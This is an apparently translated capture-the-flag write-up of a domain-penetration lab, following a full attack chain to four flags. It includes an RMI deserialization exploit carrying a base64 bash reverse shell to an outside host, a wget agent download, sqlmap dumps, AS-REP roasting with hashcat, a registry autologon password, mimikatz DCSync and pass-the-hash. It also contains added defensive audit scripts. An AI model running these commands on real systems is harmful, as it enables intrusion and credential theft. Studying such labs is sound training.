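Time

Time is a medium-difficulty lab environment. Completing the challenge helps players understand proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement in internal-network penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The lab has 4 flags, distributed across different target machines.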
Tags: Neo4j, Privilege Elevation, Kerberos, domain penetration
Information gathering

First, scan the host with fscan:

```
./fscan.exe -h 39.98.107.186 -p 1-65535 -nobr
```

```
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.98.107.186:22 open
39.98.107.186:1337 open
39.98.107.186:7474 open
39.98.107.186:7473 open
39.98.107.186:7687 open
39.98.107.186:41409 open
[*] alive ports len is: 6
start vulscan
已完成 1/6 [-] webtitle https://39.98.107.186:1337 Get "https://39.98.107.186:1337": EOF
[*] WebTitle http://39.98.107.186:7474 code:303 len:0 title:None 跳转url: http://39.98.107.186:7474/browser/
[*] WebTitle https://39.98.107.186:7687 code:400 len:50 title:None
[*] WebTitle http://39.98.107.186:7474/browser/ code:200 len:3279 title:Neo4j Browser
[*] WebTitle https://39.98.107.186:7473 code:303 len:0 title:None 跳转url: https://39.98.107.186:7473/browser/
[*] WebTitle https://39.98.107.186:7473/browser/ code:200 len:3279 title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 4m33.9089862s
```
Machine 36

Port 7687 stands out; looking it up shows that it is the default port of the Neo4j graph database. The 400 error suggests there may be unauthorized access.

```
echo "bash -i >& /dev/tcp/119.45.6.65/8888 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuNDUuNi42NS84ODg4IDA+JjE=
nc -lvvp 8888
java -jar rhino_gadget.jar rmi://39.98.107.186:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuNDUuNi42NS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
```
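Start a local web server and put the files to be downloaded in its directory:

```
python3 -m http.server 80
```

Download them from the shell:

```
wget http://119.45.6.65/linux_x64_agent
./linux_x64_agent -l 44444 -s 123
./linux_x64_admin -c 39.98.107.186:44444 -s 123
```

The connection succeeds; grab flag01: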
```
neo4j@ubuntu:~$ cat flag01.txt
cat flag01.txt

flag01: flag{71d59e48-f05f-43d4-8d98-3917d37ff490}

Do you know the authentication process of Kerberos?
......This will be the key to your progress.
```
Then use Stowaway to upload fscan:

```
upload /home/kali/Desktop/fscan /tmp/fscan
ifconfig
./fscan -h 172.22.6.0/24
```
```
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.38 is alive
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.36 is alive
(icmp) Target 172.22.6.25 is alive
[*] Icmp alive hosts len is: 4
172.22.6.38:80 open
172.22.6.12:88 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] WebTitle http://172.22.6.38 code:200 len:1531 title:后台登录
[*] NetBios 172.22.6.12 [+] DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.6.25 XIAORANG\WIN2019
[*] OsInfo 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] NetInfo
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] WebTitle https://172.22.6.36:7687 code:400 len:50 title:None
已完成 11/11
[*] 扫描结束,耗时: 11.882757703s
```
- 172.22.6.12: DC (domain controller)
- 172.22.6.25
- 172.22.6.38
- 172.22.6.36: this host
Machine 38

Browsing to http://172.22.6.38 shows a login page. Capture the request with Burp, write it to bp.txt, and test it with sqlmap:

```
proxychains sqlmap -r bp.txt
```

```
[09:23:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
```

```
proxychains sqlmap -r bp.txt --os-shell
```

The attempt to get a shell directly fails.

```
proxychains sqlmap -r bp.txt --dbs
```

```
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys
```

```
proxychains sqlmap -r bp.txt -D 'oa_db' --tables
```

```
+------------+
| oa_admin   |
| oa_f1Agggg |
| oa_users   |
+------------+
```

```
proxychains sqlmap -r bp.txt -D 'oa_db' -T 'oa_f1Agggg' --dump
```

```
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+
```

That gets flag02. The commands above are rather tedious, though; it is easier to dump everything at once:

```
proxychains sqlmap -r bp.txt --dump
```

The dump turns up a large number of users.
The email values in the dump look very much like domain users, so write a script that extracts the usernames and saves them as 2.txt:

```python
import re

# Read the source file
with open('1.txt', 'r') as file:
    content = file.read()

# Match every target email address with a regular expression and extract the username
matches = re.findall(r'(\w+)@xiaorang\.lab', content)

# De-duplicate while keeping the original order
unique_matches = []
for match in matches:
    if match not in unique_matches:
        unique_matches.append(match)

# Write the result to a new file (one username per line)
with open('2.txt', 'w') as output_file:
    output_file.write('\n'.join(unique_matches))

print(f"成功提取 {len(unique_matches)} 个用户名到 2.txt")
```
GetNPUsers.py is a script from the Impacket toolkit that tries to obtain TGT output for users that have the "Do not require Kerberos preauthentication" property set. The returned hash is encrypted with a key derived from the user's password, so once it has been obtained it can be cracked directly with JTR or hashcat.

```
proxychains impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile 2.txt xiaorang.lab/
```

One such entry comes back; save it to hash.txt and crack it with hashcat:

```
$krb5asrep$23$zhangxin@XIAORANG.LAB:33b29a5e607fe08df10fe058fd413199$d3cbf653d743ffcf112d47747866ff69a70a99c4276c84731321e667d1ceb5b6ecb3273370f19567af0f53819c46e954f9572d079f7587afdb708077cc508aed3d66846a3f23ffa30c4cdf42edbe6038d91f44c00650fa3427bb1833f830a1273f1e183255aadfc9ce75b01e202f350138e6cda90d3ab32a292e884fbe9a16c2e4caa4b6a42195d426694c79e63a443487b88f26f4629f3ff4d6dbe59201878f572878dab5472edf8410bac550ea3968a490c35c643a2b320845f5a30028fc86ec50794f124422dc2d709a85b5b249360b7d340781b861dcf506b26dd5804cd704d54bf4e316bc9f7bc747f0
```
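-m 18200: Kerberos 5, etype 23, AS-REP (Authentication Service Reply)

- Meaning: this mode cracks hashes extracted from a Kerberos Authentication Service Reply (AS-REP).
- Source: in the first stage of Kerberos authentication, the user (client) sends an AS-REQ containing the username to the KDC. If the account is configured with "Do not require Kerberos preauthentication" (preauthentication disabled), the KDC returns an AS-REP directly. Part of that response is encrypted with a key derived from the user's password.
- Contents: the hash represents the key used to encrypt that part of the AS-REP. The key is derived from the account's password.
- Attack target: cracking the hash yields the account's password. This is one way to obtain domain user credentials, but only when the account has preauthentication disabled (which is generally considered an insecure configuration).
- Typical hashcat hash format:

```
$krb5asrep$23$UserAccountName@REALM:HexEncodedPart1$HexEncodedPart2
```

- `$krb5asrep$`: marks the value as an AS-REP hash.
- `23`: the encryption type is rc4-hmac (etype 23).
- `UserAccountName@REALM`: the account name and realm of the user with preauthentication disabled.
- `HexEncodedPart1` / `HexEncodedPart2`: hex-encoded blocks extracted from the AS-REP response.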
```
hashcat -a 0 -m 18200 --force hash.txt /usr/share/wordlists/rockyou.txt
```

Cracking succeeds with the following result:

```
$krb5asrep$23$zhangxin@XIAORANG.LAB:33b29a5e607fe08df10fe058fd413199$d3cbf653d743ffcf112d47747866ff69a70a99c4276c84731321e667d1ceb5b6ecb3273370f19567af0f53819c46e954f9572d079f7587afdb708077cc508aed3d66846a3f23ffa30c4cdf42edbe6038d91f44c00650fa3427bb1833f830a1273f1e183255aadfc9ce75b01e202f350138e6cda90d3ab32a292e884fbe9a16c2e4caa4b6a42195d426694c79e63a443487b88f26f4629f3ff4d6dbe59201878f572878dab5472edf8410bac550ea3968a490c35c643a2b320845f5a30028fc86ec50794f124422dc2d709a85b5b249360b7d340781b861dcf506b26dd5804cd704d54bf4e316bc9f7bc747f0:strawberry
```

That is, zhangxin@XIAORANG.LAB : strawberry
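The hash format and the precondition described above (preauthentication disabled) can be checked from the defender's side. The following is an added example, not part of the original writeup: it splits a `$krb5asrep$` line into its fields and lists enabled accounts whose `userAccountControl` has the "Do not require Kerberos preauthentication" bit set. The account names, realm, hex fields and directory rows are constructed.

```python
import re

# userAccountControl bits (Microsoft-documented values)
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # "Do not require Kerberos preauthentication"

ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# $krb5asrep$<etype>$<user>@<REALM>:<hex part 1>$<hex part 2>[:<recovered password>]
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:]+)@(?P<realm>[^$:]+):"
    r"(?P<part1>[0-9a-fA-F]+)\$(?P<part2>[0-9a-fA-F]+)(?::(?P<plain>.*))?$"
)


def parse_asrep_line(line):
    """Split one hash line into its fields; raise ValueError if it is malformed."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a $krb5asrep$ line")
    part1, part2 = m["part1"], m["part2"]
    if len(part1) % 2 or len(part2) % 2:
        raise ValueError("hex fields must contain whole bytes")
    etype = int(m["etype"])
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m["user"],
        "realm": m["realm"],
        "part1_bytes": len(part1) // 2,
        "part2_bytes": len(part2) // 2,
        # hashcat appends ":<password>" to the line once it has been recovered
        "cracked": m["plain"] is not None,
    }


def accounts_without_preauth(directory_rows):
    """Return enabled accounts that have DONT_REQUIRE_PREAUTH set."""
    exposed = []
    for row in directory_rows:
        uac = int(row["userAccountControl"])
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            exposed.append(row["sAMAccountName"])
    return sorted(exposed)


# Constructed sample lines: the hex fields are short placeholders, not a real AS-REP.
SAMPLE_LINES = [
    "$krb5asrep$23$svc_report@EXAMPLE.LAB:" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5asrep$23$svc_backup@EXAMPLE.LAB:" + "01" * 16 + "$" + "ef" * 40 + ":placeholder",
]
# Constructed directory export (userAccountControl as a decimal string).
SAMPLE_DIRECTORY = [
    {"sAMAccountName": "svc_report", "userAccountControl": "4260352"},  # 0x410200
    {"sAMAccountName": "svc_backup", "userAccountControl": "4194818"},  # 0x400202, disabled
    {"sAMAccountName": "alice", "userAccountControl": "512"},           # normal account
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(parse_asrep_line(sample))
    print("preauth disabled:", accounts_without_preauth(SAMPLE_DIRECTORY))
```

Accounts returned by `accounts_without_preauth` are the ones for which a KDC answers an AS-REQ without preauthentication; clearing the flag or giving them long random passwords removes the exposure.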
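Machine 25

Set up a proxy on Windows (Proxifier):

```
./linux_x64_agent -l 44445 -s 123
./windows_x64_admin.exe -c 39.98.107.186:44445 -s 123
```

Then connect directly over Remote Desktop. BloodHound is used here to look at the structure of the domain. First upload SharpHound.exe to the internal host, then run:

```
SharpHound.exe -c all
```

This produces a zip file; pull it down, start BloodHound on Kali, and import the zip file into BloodHound.

BloodHound shows that the yuxuan user abuses the SID History feature. (SIDHistory is an attribute that exists to support domain migration: when an object is migrated from one domain to another, a new SID is created in the new domain as the object's objectSid, and the SID from the previous domain is added to the object's sIDHistory attribute, so the object keeps the access rights associated with its SID in the original domain.)

Take a look at the user: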
```
C:\Users\zhangxin>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x211ad923e0
    ShutdownFlags    REG_DWORD    0x80000027
    AutoLogonSID    REG_SZ    S-1-5-21-3623938633-4064111800-2925858365-1180
    LastUsedUsername    REG_SZ    yuxuan
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    yuxuan
    DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
    DefaultDomainName    REG_SZ    xiaorang.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
```
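The Winlogon query above returns an autologon password in plaintext. As an added example (not part of the original writeup), this audit parses saved `reg query` output and reports a stored `DefaultPassword` and an enabled `AutoAdminLogon`; the sample output, account name and password are constructed placeholders.

```python
import re

# Constructed `reg query` output; the account and password are placeholders.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Background    REG_SZ    0 0 0
    LegalNoticeCaption    REG_SZ
    Shell    REG_SZ    explorer.exe
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk01
    DefaultPassword    REG_SZ    Placeholder-Pass 1
    DefaultDomainName    REG_SZ    example.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

# A value line is: indent, name, four spaces, type, then optionally four spaces and data.
VALUE_RE = re.compile(
    r"^\s+(?P<name>\S.*?)\s{4}(?P<type>REG_[A-Z_]+)(?:\s{4}(?P<data>.*))?$"
)


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query` text."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip(), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # Values such as LegalNoticeCaption may have no data at all.
            current[m["name"]] = (m["type"], (m["data"] or "").strip())
    return keys


def audit_autologon(text):
    """List autologon weaknesses found under the Winlogon key itself."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if not key.lower().endswith(r"\currentversion\winlogon"):
            continue  # skip subkeys such as GPExtensions
        lookup = {name.lower(): data for name, (_type, data) in values.items()}
        user = lookup.get("defaultusername", "")
        domain = lookup.get("defaultdomainname", "")
        if lookup.get("defaultpassword"):
            account = f"{domain}\\{user}" if domain else user
            findings.append(
                f"plaintext DefaultPassword stored for {account or 'unknown account'}"
            )
        if lookup.get("autoadminlogon") == "1":
            findings.append("AutoAdminLogon is enabled")
    return findings


if __name__ == "__main__":
    for finding in audit_autologon(SAMPLE_REG_OUTPUT):
        print(finding)
```

A `DefaultPassword` finding means that any account able to read the key can read the password, as the zhangxin session above did.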
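The Winlogon values give the password of the yuxuan user. Reconnect over RDP as yuxuan/Yuxuan7QbrgZ3L. Because this account retains domain administrator access rights, the hashes can be dumped directly; export them with mimikatz.exe:

```
lsadump::dcsync /domain:xiaorang.lab /all /csv
```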
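This yields the administrator hash. Machine 25 is already joined to the domain, and BloodHound also shows its administrator account as a member of the domain, so this amounts to taking the domain controller.

```
500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512
```

Pass-the-hash can therefore be used directly to get the high-privilege flag03 on machine 25:

```
proxychains impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
```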
```
C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt
flag03: flag{fa146ed1-4b58-45ad-92c0-84b1cfe68592}

Maybe you can find something interesting on this server.

=======================================
What you may not know is that many objects in this domain are moved from other domains.
```
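The SID History abuse that BloodHound surfaced in this section can be audited from a directory export. The following added example (not part of the original writeup) flags `sIDHistory` entries that come from the account's own domain or that carry a well-known privileged RID; both checks are heuristics, and the SIDs and account names are constructed.

```python
# Well-known privileged RIDs inside a domain (Microsoft well-known SIDs).
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
BUILTIN_DOMAIN = "S-1-5-32"  # e.g. S-1-5-32-544 is BUILTIN\Administrators


def split_sid(sid):
    """Return (domain_part, rid) for a SID string such as S-1-5-21-a-b-c-1180."""
    parts = sid.strip().split("-")
    if len(parts) < 4 or parts[0].upper() != "S" or not all(p.isdigit() for p in parts[1:]):
        raise ValueError(f"malformed SID: {sid!r}")
    return "-".join(parts[:-1]).upper(), int(parts[-1])


def audit_sid_history(accounts):
    """Return (account, historic SID, reasons) for each suspicious sIDHistory entry."""
    findings = []
    for acct in accounts:
        own_domain, _ = split_sid(acct["objectSid"])
        for old_sid in acct.get("sIDHistory", []):
            domain, rid = split_sid(old_sid)
            reasons = []
            # A migrated object carries a SID from its previous domain, so a
            # historic SID from the account's current domain is unexpected.
            if domain == own_domain:
                reasons.append("SID is from the account's own domain")
            if domain == BUILTIN_DOMAIN:
                reasons.append("SID is a BUILTIN group")
            elif rid in PRIVILEGED_RIDS:
                reasons.append(f"RID {rid} is {PRIVILEGED_RIDS[rid]}")
            if reasons:
                findings.append((acct["sAMAccountName"], old_sid, reasons))
    return findings


# Constructed directory export: two domains with made-up identifiers.
CURRENT = "S-1-5-21-1111111111-2222222222-3333333333"
FORMER = "S-1-5-21-4444444444-5555555555-6666666666"
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "migrated_user", "objectSid": f"{CURRENT}-1201",
     "sIDHistory": [f"{FORMER}-1105"]},   # ordinary migration, not flagged
    {"sAMAccountName": "helpdesk02", "objectSid": f"{CURRENT}-1180",
     "sIDHistory": [f"{CURRENT}-500"]},   # same domain and Administrator RID
    {"sAMAccountName": "svc_legacy", "objectSid": f"{CURRENT}-1300",
     "sIDHistory": [f"{FORMER}-512"]},    # Domain Admins of the former domain
    {"sAMAccountName": "plain_user", "objectSid": f"{CURRENT}-1400"},
]

if __name__ == "__main__":
    for name, sid, reasons in audit_sid_history(SAMPLE_ACCOUNTS):
        print(f"{name}: {sid} -> {'; '.join(reasons)}")
```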
Domain controller

Then use pass-the-hash in the same way to get flag04 on the domain controller:

```
proxychains impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12 -codec gbk
```

```
C:\Windows\system32>type C:\Users\Administrator\flag\flag04.txt
Awesome! you got the final flag.

flag04: flag{fd60ce54-3cae-440a-afbd-4c5bc0d6a9c5}
```